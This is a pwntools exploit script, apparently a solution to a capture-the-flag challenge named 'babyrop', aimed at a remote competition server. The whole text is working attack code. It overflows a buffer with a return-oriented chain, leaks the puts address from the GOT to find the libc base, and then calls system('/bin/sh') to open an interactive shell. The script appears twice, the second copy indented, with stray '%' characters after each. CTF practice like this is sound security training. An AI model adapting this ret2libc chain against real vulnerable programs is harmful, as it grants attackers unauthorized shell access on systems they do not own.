po6ix/babyrop.py

## babyrop.py
from pwn import *

# p = process('./babyrop')
p = remote('remote1.thcon.party', 10900)
e = ELF('./babyrop')
libc = ELF('./libc6_2.27-3ubuntu1.4_amd64.so')

pop_rdi = 0x00000000004012c3
pop_rsi = 0x00000000004012c1
ret = 0x000000000040101a

payload = b'a'*0x28
payload += p64(pop_rdi)
payload += p64(e.got['puts'])
payload += p64(e.plt['puts'])
payload += p64(e.sym['main_function'])

p.sendline(payload)
p.recvuntil('?')
p.recvline()

libc_leak = u64(p.recvline()[:-1].ljust(8, b'\0'))
libc_base = libc_leak - libc.sym['puts']
system = libc_base + libc.sym['system']
binsh = libc_base + next(libc.search(b'/bin/sh'))

print(hex(libc_leak))
print(hex(libc_base))
print(hex(system))
print(hex(binsh))

payload = b'a'*0x28
payload += p64(pop_rdi)
payload += p64(binsh)
payload += p64(ret)
payload += p64(system)

p.sendline(payload)
p.interactive()%
	from pwn import *

	# p = process('./babyrop')
	p = remote('remote1.thcon.party', 10900)
	e = ELF('./babyrop')
	libc = ELF('./libc6_2.27-3ubuntu1.4_amd64.so')

	pop_rdi = 0x00000000004012c3
	pop_rsi = 0x00000000004012c1
	ret = 0x000000000040101a

	payload = b'a'*0x28
	payload += p64(pop_rdi)
	payload += p64(e.got['puts'])
	payload += p64(e.plt['puts'])
	payload += p64(e.sym['main_function'])

	p.sendline(payload)
	p.recvuntil('?')
	p.recvline()

	libc_leak = u64(p.recvline()[:-1].ljust(8, b'\0'))
	libc_base = libc_leak - libc.sym['puts']
	system = libc_base + libc.sym['system']
	binsh = libc_base + next(libc.search(b'/bin/sh'))

	print(hex(libc_leak))
	print(hex(libc_base))
	print(hex(system))
	print(hex(binsh))

	payload = b'a'*0x28
	payload += p64(pop_rdi)
	payload += p64(binsh)
	payload += p64(ret)
	payload += p64(system)

	p.sendline(payload)
	p.interactive()%